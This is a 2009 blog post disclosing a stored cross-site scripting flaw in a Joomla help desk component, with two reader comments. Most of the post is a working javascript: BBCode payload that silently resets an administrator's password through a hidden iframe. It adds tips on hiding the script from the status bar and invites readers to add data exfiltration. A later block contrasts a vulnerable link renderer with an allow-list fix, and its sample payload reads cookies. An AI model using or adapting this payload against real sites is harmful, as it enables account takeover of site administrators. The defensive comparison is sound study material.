Friday, 03 July 2009 15:31

I found a nice little exploit for WebAmoeba Ticket System 3.0.0, a Joomla help desk component. The vulnerability is in the BBCode library the component uses to parse ticket text: when it turns a [url=...] tag into a link it copies the target straight into the href attribute without checking the URL scheme, so javascript: URLs are not stripped from [url] tags.

To exploit this flaw, the attacker needs an account on the victim site with permission to post new support tickets, and the BBCode parser must be enabled (it is by default). If those conditions are met, the attacker can embed a javascript: link in a ticket message. Nothing runs until someone clicks the link, but when they do, the script runs in the site's origin with the clicker's session, and the people who read new tickets are the support staff and administrators. For example:

[url=javascript:/*http://google.com                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     */var exploited=false;foo=function(){var iframe=document.createElement('iframe');iframe.src='/index.php?option=com_user&task=edit&tmpl=component';document.body.appendChild(iframe);iframe.addEvent('load',payload);iframe.setStyle('display','none');function payload(e){if(exploited){location.href='http://google.com';}else{var doc=e.target.contentDocument;if(!doc)return;doc.getElementById('password').value='hackedpass';doc.getElementById('password2').value='hackedpass';doc.getElementsByTagName('form').item(0).submit();exploited=true;}}};foo();]http://google.com[/url]

A few pointers for this exploit. Newlines are converted to <br> tags, so the whole payload must sit on one line. Square brackets are stripped by the BBCode regexp, so array notation such as forms[0] won't work; that is why the payload above uses getElementsByTagName('form').item(0) instead. The malicious URL also shows in the browser's status bar when the admin hovers over the link. This can be mitigated somewhat by starting the script with a block comment that contains a real URL followed by a long run of spaces, which pushes the actual script past the visible width of the status bar, so the victim sees only something like "javascript:/*http://google.com". That may be just enough to fool an unsuspecting admin; anyone who copies the link target or views the page source will still see the whole thing.

This particular script appends a new, hidden iframe to the existing page and points it at the front-end user edit form (com_user with task=edit; tmpl=component renders the form without the site template). Because the iframe is same-origin and carries the admin's session, the script can read its document: on the first load it fills both password fields with 'hackedpass' and submits the form; on the second load, after the save, it redirects the top page to the spoofed destination, google.com. Note that addEvent and setStyle are MooTools Element methods, which Joomla 1.5 bundles, so the payload assumes MooTools is loaded on the page that displays the ticket; with plain DOM calls it would use addEventListener and style.display instead. There is no notification in this exploit to let the attacker know it has succeeded. To achieve that, the attacker would want to add a bit more script to submit this information elsewhere. I'll leave that as an exercise for the attacker.
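The class of bug described above, shown as an added example rather than code from the WebAmoeba component or from this post: a minimal [url] tag handler that reproduces the flaw (the target goes into href unchanged) next to a hardened version that parses the target and allows only an explicit list of schemes. The tag syntax, the scheme list and the sample ticket text are assumptions made for the demonstration.

```javascript
// Added example, not code from the WebAmoeba component or from this post.
// It shows the class of bug described above with a minimal [url] handler:
// the vulnerable version copies the tag's target into href unchanged, the
// hardened version parses it and allows only an explicit list of schemes.
// Tag syntax assumed: [url=TARGET]TEXT[/url]. All inputs are constructed.

const URL_TAG = /\[url=([^\]]*)\]([^\[]*)\[\/url\]/gi;

// Escape for an HTML text node or a double-quoted attribute value.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  })[c]);
}

// Vulnerable: whatever sits between [url= and ] becomes the href.
// HTML-escaping stops tag injection, but the browser decodes entities before
// it interprets the attribute, so a javascript: target still runs on click.
function renderUrlVulnerable(bbcode) {
  return bbcode.replace(URL_TAG, (match, target, text) =>
    `<a href="${escapeHtml(target)}">${escapeHtml(text)}</a>`);
}

// Hardened: parse the target with the WHATWG URL parser and allow-list the
// scheme. The parser strips leading/trailing whitespace and embedded tab or
// newline characters and lower-cases the scheme, so "  JavaScript:" and
// "java\tscript:" are normalised before the check instead of slipping past a
// naive startsWith('javascript:') test. Relative targets fail to parse and are
// rejected too; a real site would resolve them against its own base URL.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

function safeHref(target) {
  let parsed;
  try {
    parsed = new URL(target);
  } catch (e) {
    return null;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

function renderUrlHardened(bbcode) {
  return bbcode.replace(URL_TAG, (match, target, text) => {
    const href = safeHref(target);
    // Drop the link entirely rather than trying to "clean" the scheme;
    // the visible text is kept so the ticket still reads sensibly.
    if (href === null) return escapeHtml(text);
    return `<a href="${escapeHtml(href)}">${escapeHtml(text)}</a>`;
  });
}

// Constructed ticket text in the shape of the payload above. The block
// comment and the padding hide the script in a status bar, not from a parser.
const SAMPLE_TICKET =
  'Please help, see [url=javascript:/*http://google.com' + ' '.repeat(40) +
  '*/alert(document.cookie)]http://google.com[/url] for details.';

console.log('vulnerable:', renderUrlVulnerable(SAMPLE_TICKET));
console.log('hardened:  ', renderUrlHardened(SAMPLE_TICKET));
```

Rejecting on an allow-list of schemes is the right shape of fix; a deny-list of "javascript:" alone misses data: and vbscript: URLs and the case and whitespace variants the URL parser normalises away.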

Last Updated on Saturday, 04 July 2009 00:06
 
Comments (2)
1 Tuesday, 25 August 2009 15:58
Cris Papadatos
Hi. Thanks for the info, but how can we disable BBCode?
2 Tuesday, 25 August 2009 17:48
Jeff Channell
I don't have it installed any more to check, but I'd imagine there's an option in the administrator control panel for it...
